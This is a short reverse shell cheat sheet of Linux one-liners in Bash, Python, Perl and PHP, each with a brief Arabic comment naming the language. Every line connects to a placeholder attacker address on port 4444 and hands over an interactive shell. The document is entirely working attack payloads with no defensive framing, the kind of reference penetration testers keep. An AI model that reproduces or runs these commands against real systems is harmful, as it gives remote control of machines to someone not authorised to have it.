# Reverse Shells - Linux One-Liners

## Bash
bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1
# شِل عكسي باستخدام bash

## Python
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("<ATTACKER_IP>",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
# شِل عكسي باستخدام Python + TTY

## Perl
perl -e 'use Socket;$i="<ATTACKER_IP>";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# شِل عكسي باستخدام Perl

## PHP
php -r '$sock=fsockopen("<ATTACKER_IP>",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# شِل عكسي باستخدام PHP
